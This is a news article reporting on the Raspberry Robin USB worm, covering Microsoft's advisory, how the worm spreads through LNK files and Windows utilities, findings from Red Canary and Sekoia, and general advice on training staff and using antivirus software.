A malware program called “Raspberry Robin” has infected hundreds of Windows networks across multiple sectors, according to a private threat intelligence advisory from Microsoft.
While ransomware attacks often make headlines, the dangers posed by malware can be equally as damaging and are another reason to ensure you’re using antivirus software.
The threat group responsible for the malware is currently unknown, as are their motivations and end goal.
Raspberry Robin Worm Infects Networks
Microsoft released a private threat intelligence advisory, informing organizations that a worm called Rasberry Robin has infected “hundreds of Windows networks” reports BleepingComputer,
Raspberry Robin spreads through removable, external USB devices. In other words, in order to infect a device, a user must plug a USB into it and click the malicious file contained within.
A Windows command prompt is exploited, and a malicious code is executed on the given device — after which a command and control server is contacted and more malicious files are downloaded.
More legitimate Windows programs — including utilities such as “fodhelper”, “msiexec” and “odbcconf” — are used to execute that code and then the worm will attempt to connect to the Tor network.
Raspberry Robin: A Brief Recent History
The worm dubbed “Rasberry Robin” was first discovered back in September 2021 by intelligence analysts at Red Canary, although most of the activity attributed to the worm has been happening since January 2022. The security researchers observed it mostly in tech and manufacturing networks.
Cybersecurity company Sekoia – which calls it the “QNAP Worm” – has also been tracking the worm in November of last year.
Sekoia said it was using “compromised QNAP devices as command and control servers” and observed it as active in several French networks. For a piece of malware being investigated by a number of security teams, however, it remains relatively mysterious.
“This worm is using LNK files taking the icons of removable devices to spread (eg. Network shares, USB devices). These LNK files are using well-known techniques in order to download and execute from a compromised device an MSI package containing a malicious library” – Sekoia security team.
As previously mentioned, Microsoft has observed it connecting to addresses on the Tor network, but it doesn't they haven’t actually exploited the access to networks it has infiltrated, despite flexing its power and showing it can use utilities within the Windows OS.
What’s more, Sekoia noted in their report on the malware that “its main code is quite sophisticated and the infrastructure used is large”, which raises more questions than answers about the nature of the threat itself.
Microsoft, on the other hand, says it found malicious artifacts relating to the worm that were created as far back as 2019.
Protecting Yourself Against Malware
Although threats like these seem powerful, extensive and downright scary, there are a couple of things that businesses and individuals can do to protect themselves and minimize the attack surface of a company or home network.
The first is to keep staff — and yourself, for that matter — in the know about the latest threats and instate, compulsory cyber and data security training.
Secondly, install reputable antivirus software on your company network. Antivirus software is designed to detect and remove malware, viruses, and other malicious files from computers and networks. All in all, it's the best defense against this sort of thing.